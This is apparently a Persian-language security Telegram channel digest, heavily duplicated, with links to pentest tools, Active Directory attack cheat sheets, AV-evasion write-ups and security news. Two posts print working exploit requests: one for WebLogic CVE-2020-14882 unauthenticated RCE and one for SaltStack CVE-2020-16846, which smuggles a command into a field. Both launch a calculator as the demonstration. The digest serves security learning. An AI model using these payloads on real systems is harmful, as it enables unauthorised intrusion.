When ntuser.pol leads you to SYSTEM
https://decoder.cloud/2020/10/24/when-ntuser-pol-leads-you-to-system/
#windows
#privesc
@sec_nerd
https://decoder.cloud/2020/10/24/when-ntuser-pol-leads-you-to-system/
#windows
#privesc
@sec_nerd
آسیب پذیری عجیب Tiki Wiki Cms Groupware
CVE-2020-15906
https://github.com/S1lkys/CVE-2020-15906
بعد از بروت فورس و قفل شدن اکانت ادمین، امکان ورود با پسورد خالی فراهم میشود!
#web
#pentest
#writeup
@sec_nerd
CVE-2020-15906
https://github.com/S1lkys/CVE-2020-15906
بعد از بروت فورس و قفل شدن اکانت ادمین، امکان ورود با پسورد خالی فراهم میشود!
#web
#pentest
#writeup
@sec_nerd
دستورات و ابزارهای کاربردی در تست نفوذ به اکتیودایرکتوری
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
#AD
#windows
#pentest
@sec_nerd
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
#AD
#windows
#pentest
@sec_nerd
GitHub
GitHub - Integration-IT/Active-Directory-Exploitation-Cheat-Sheet: A cheat sheet that contains common enumeration and attack methods…
A cheat sheet that contains common enumeration and attack methods for Windows Active Directory. - Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
ابزارهای ویندوزی برای تیم های قرمز
https://github.com/Mr-Un1k0d3r/RedTeamCSharpScripts
به زبان سی شارپ
#pentest
@sec_nerd
https://github.com/Mr-Un1k0d3r/RedTeamCSharpScripts
به زبان سی شارپ
#pentest
@sec_nerd
GitHub
GitHub - Mr-Un1k0d3r/RedTeamCSharpScripts: C# Script used for Red Team
C# Script used for Red Team. Contribute to Mr-Un1k0d3r/RedTeamCSharpScripts development by creating an account on GitHub.
صفر تا صد نفوذ به اکتیودایرکتوری
https://rootsecdev.medium.com/forest-a-walk-through-in-hacking-active-directory-c83ecb21e1a9
#AD
#windows
#network
@sec_nerd
https://rootsecdev.medium.com/forest-a-walk-through-in-hacking-active-directory-c83ecb21e1a9
#AD
#windows
#network
@sec_nerd
Medium
Forest: A walk through in hacking active directory
This box is on the retired list in hack the box. Here is a walk through on how I got full system privileges in this active directory…
آسیب پذیری RCE در weblogic
بدون نیاز به احراز هویت
CVE-2020–14882
https://x.x.x.x:7001/console/images/%252E%252E%252Fconsole.portal
POST:
_nfpb=true&_pageLabel=&handle=https://com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27calc.exe%27);%22)
https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf
#weblogic
#rce
#java
@sec_nerd
بدون نیاز به احراز هویت
CVE-2020–14882
https://x.x.x.x:7001/console/images/%252E%252E%252Fconsole.portal
POST:
_nfpb=true&_pageLabel=&handle=https://com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27calc.exe%27);%22)
https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf
#weblogic
#rce
#java
@sec_nerd
In-Memory shellcode decoding to evade AVs/EDRs
https://shells.systems/in-memory-shellcode-decoding-to-evade-avs/
#windows
#pentest
#bypass
@sec_nerd
https://shells.systems/in-memory-shellcode-decoding-to-evade-avs/
#windows
#pentest
#bypass
@sec_nerd
دپارتمان امنیت ملی امریکا و FBI طی گزارشی به جزییات عملیات هکرهای ایرانی در سرقت آراء و تاثیرگذاری بر انتخابات امریکا پرداختند.
در این گزارش مشخص شد هکرهای ایرانی با ابزارهایی نظیر Acunetix و sqlmap اقدام به نفوذ به وبسایتهای مرتبط با انتخابات کرده و با کشف مشکلاتی نظیر باگهای sql injection و directory traversal توانستند اطلاعات رای دهندگان را بدست آورند.
این اطلاعات در ارسال ایمیل های فیک از سوی کامیونیتی Proud Boy و تهدید رای دهندگان به رای دادن به نفع ترامپ به کار گرفته شد.
همچنین اعلام شد این هکرها از nordvpn و برخی سرویس های وی پی ان دیگر در این عملیات بهره برده اند.
https://www.bleepingcomputer.com/news/security/fbi-how-iranian-hackers-stole-voter-info-from-state-election-sites/
#news
#iran
#usa
@sec_nerd
در این گزارش مشخص شد هکرهای ایرانی با ابزارهایی نظیر Acunetix و sqlmap اقدام به نفوذ به وبسایتهای مرتبط با انتخابات کرده و با کشف مشکلاتی نظیر باگهای sql injection و directory traversal توانستند اطلاعات رای دهندگان را بدست آورند.
این اطلاعات در ارسال ایمیل های فیک از سوی کامیونیتی Proud Boy و تهدید رای دهندگان به رای دادن به نفع ترامپ به کار گرفته شد.
همچنین اعلام شد این هکرها از nordvpn و برخی سرویس های وی پی ان دیگر در این عملیات بهره برده اند.
https://www.bleepingcomputer.com/news/security/fbi-how-iranian-hackers-stole-voter-info-from-state-election-sites/
#news
#iran
#usa
@sec_nerd
امنیت اطلاعات
آسیب پذیری RCE در weblogic بدون نیاز به احراز هویت CVE-2020–14882 https://x.x.x.x:7001/console/images/%252E%252E%252Fconsole.portal POST: _nfpb=true&_pageLabel=&handle=https://com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime(…
GitHub
GitHub - jas502n/CVE-2020-14882: CVE-2020–14882、CVE-2020–14883
CVE-2020–14882、CVE-2020–14883. Contribute to jas502n/CVE-2020-14882 development by creating an account on GitHub.
اکسپلویت آسیب پذیری لو دادن اطلاعات در sharepoint مایکروسافت
CVE: CVE-2020-17017
https://srcincite.io/pocs/cve-2020-17017.py.txt
#sharepoint
#windows
@sec_nerd
CVE: CVE-2020-17017
https://srcincite.io/pocs/cve-2020-17017.py.txt
#sharepoint
#windows
@sec_nerd
برنامه نویس سابق مایکروسافت به ۹ سال حبس محکوم شد!
ولودیمیر کواشوک ۲۶ ساله که اهل اوکراین است از سال ۲۰۱۶ بعنوان یک برنامه نویس تمام وقت با مایکروسافت کار خود را شروع کرد و در سال ۲۰۱۸ این همکاری به پایان رسید.
او در طی این مدت در پروژه ی فروش آنلاین مایکروسافت مشغول به فعالیت بود که با سوء استفاده از دسترسی خود اقدام به دزدیدن CSV (چیزی شبیه به گیفت کارت) نمود.
در ابتدا او با دزدی مقادیر اندک کار خود را ادامه داد و تا ۱۲ هزار دلار از این طریق بدست آورد اما پس از آن به این مقدار اکتفا نکرد و دست به دزدی میلیون دلاری زد.
کواشوک در نهایت مقدار 2.8 میلیون دلار به سرقت برد. حالا او باید 8.34 میلیون دلار جریمه بپردازد و با ۱۸ عنوان اتهامی ۹ سال را در زندان بگذراند.
https://www.darkreading.com/attacks-breaches/former-microsoft-software-engineer-sentenced-to-9-years-in-prison/d/d-id/1339422
#news
#microsoft
@sec_nerd
ولودیمیر کواشوک ۲۶ ساله که اهل اوکراین است از سال ۲۰۱۶ بعنوان یک برنامه نویس تمام وقت با مایکروسافت کار خود را شروع کرد و در سال ۲۰۱۸ این همکاری به پایان رسید.
او در طی این مدت در پروژه ی فروش آنلاین مایکروسافت مشغول به فعالیت بود که با سوء استفاده از دسترسی خود اقدام به دزدیدن CSV (چیزی شبیه به گیفت کارت) نمود.
در ابتدا او با دزدی مقادیر اندک کار خود را ادامه داد و تا ۱۲ هزار دلار از این طریق بدست آورد اما پس از آن به این مقدار اکتفا نکرد و دست به دزدی میلیون دلاری زد.
کواشوک در نهایت مقدار 2.8 میلیون دلار به سرقت برد. حالا او باید 8.34 میلیون دلار جریمه بپردازد و با ۱۸ عنوان اتهامی ۹ سال را در زندان بگذراند.
https://www.darkreading.com/attacks-breaches/former-microsoft-software-engineer-sentenced-to-9-years-in-prison/d/d-id/1339422
#news
#microsoft
@sec_nerd
Dark Reading
Former Microsoft Software Engineer Sentenced to 9 Years in Prison
The 26-year-old was convicted earlier this year of wire fraud, money laundering, and filing false tax returns, among other charges.
👍1
نسخه چهارم ابزار معروف پسانفوذ cobalt strike دیکامپایل و بصورت متن باز و کرک شده در اختیار عموم قرار گرفت
https://www.bleepingcomputer.com/news/security/alleged-source-code-of-cobalt-strike-toolkit-shared-online/
سورس کد منتشر شده، سورس اصلی این ابزار نیست
کامنت کردن یک خط از کد برای کرک شدن آن کفایت میکند!
https://twitter.com/0xAmit/status/1326648804582563841
#tools
#post_exploitation
@sec_nerd
https://www.bleepingcomputer.com/news/security/alleged-source-code-of-cobalt-strike-toolkit-shared-online/
سورس کد منتشر شده، سورس اصلی این ابزار نیست
کامنت کردن یک خط از کد برای کرک شدن آن کفایت میکند!
https://twitter.com/0xAmit/status/1326648804582563841
#tools
#post_exploitation
@sec_nerd
اکسپلویت آسیب پذیری saltstack
CVE-2020-16846
PoC:
POST /run HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: Mozilla/5.0
Accept: application/x-yaml
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 87
token=12312&client=ssh&tgt=pyn3rd&fun=a&roster=qwe&ssh_priv=aaa%26%20open%20-a%20Calculator
#rce
#saltstack
@sec_nerd
CVE-2020-16846
PoC:
POST /run HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: Mozilla/5.0
Accept: application/x-yaml
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 87
token=12312&client=ssh&tgt=pyn3rd&fun=a&roster=qwe&ssh_priv=aaa%26%20open%20-a%20Calculator
#rce
#saltstack
@sec_nerd
رایت آپ کشف باگ ssrf به ارزش ۳۱ هزار دلار در سرویس مانیتورینگ ابر گوگل
https://nechudav.blogspot.com/2020/11/31k-ssrf-in-google-cloud-monitoring.html
#bugbounty
#google
#ssrf
@sec_nerd
https://nechudav.blogspot.com/2020/11/31k-ssrf-in-google-cloud-monitoring.html
#bugbounty
#ssrf
@sec_nerd